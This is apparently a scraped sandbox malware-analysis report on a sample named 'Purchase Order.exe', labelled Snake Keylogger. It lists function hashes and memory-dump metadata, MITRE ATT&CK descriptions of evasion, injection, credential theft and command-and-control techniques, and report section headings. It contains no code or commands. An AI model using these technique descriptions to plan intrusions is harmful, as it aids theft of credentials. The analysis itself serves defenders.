Function 05A95A70 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3810946934.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5a90000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40a44a1ad7ff6e51ee7cb764435850e7acb1f33a8d71e179e9cfc954dc2390ad
Instruction ID: e52e5750ac9f684a377ee9925d1aaa1be03cfb8b844053841109597fc1dfe40f
Opcode Fuzzy Hash: 40a44a1ad7ff6e51ee7cb764435850e7acb1f33a8d71e179e9cfc954dc2390ad
Instruction Fuzzy Hash: 44C1A274E01218CFDB19DFA5D994B9DBBB6BF89300F1080A9D809AB354DB355E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05A933B8 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3810946934.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5a90000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fc3154a0a198c471de7dd1e22774f98d663589cc787f8f6534984d45f76a3ce
Instruction ID: a178fd012c457d750bf248e44e375081c2923bb78db2825db08fd0140d6172b2
Opcode Fuzzy Hash: 0fc3154a0a198c471de7dd1e22774f98d663589cc787f8f6534984d45f76a3ce
Instruction Fuzzy Hash: 03B16474E00218CFDB54DFA9D994A9DBBB2FF89300F1081A9D919AB365DB31AD41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0152E943 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3807869787.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92aadaeaa8f4ce4b004d1e0265460696d64008b0e19a555c6367af90ba5162f7
Instruction ID: 1fc5c1117f31ec227bd040743a5cca21be77df31edccaa934d692434885f001a
Opcode Fuzzy Hash: 92aadaeaa8f4ce4b004d1e0265460696d64008b0e19a555c6367af90ba5162f7
Instruction Fuzzy Hash: 43A17C74A01228CFDB64DF64D894BDABBB2BF4A301F1085EAD509AB250DB319E81DF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A933A8 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3810946934.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5a90000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b23dea52d27b5bc0d611cd525053ebfd20ffcc61dd0fb94a9d7971d2fb16e6e
Instruction ID: 11a3cbd2615efd0c7a5ec8f0d6e97eafde6c2ba36467e7bbbcf7fc5581c9a891
Opcode Fuzzy Hash: 8b23dea52d27b5bc0d611cd525053ebfd20ffcc61dd0fb94a9d7971d2fb16e6e
Instruction Fuzzy Hash: 3151A4B4E00658CFDB48DFAAD99499DBBF2FF89300F14816AD419AB365EB309941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0152EB23 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3807869787.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 792866cd1e06661b214df88cba6b5aeeb2eb9c904173986861e5b63fca6b10dd
Instruction ID: f8df4c541c7974c1e3b5ff6f6854d1ccb62369328af7055eaca8873b02533f64
Opcode Fuzzy Hash: 792866cd1e06661b214df88cba6b5aeeb2eb9c904173986861e5b63fca6b10dd
Instruction Fuzzy Hash: F3518374A01228DFDB64DF24D895B99BBB2FF4A301F5085EAD40AAB350DB319E81DF50

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Purchase Order.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
Purchase Order.exe

Function 0690947C Relevance: 1.7, APIs: 1, Instructions: 244
processCOMMON

Function 06909488 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 0239B237 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Function 023944B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 0239590D Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 069090B0 Relevance: 1.6, APIs: 1, Instructions: 90
memoryCOMMON

Function 069091F9 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Function 06909200 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 069092E8 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Function 06908C2A Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Function 0239D288 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 0239D720 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 069092F0 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 06908C30 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 0239AF30 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre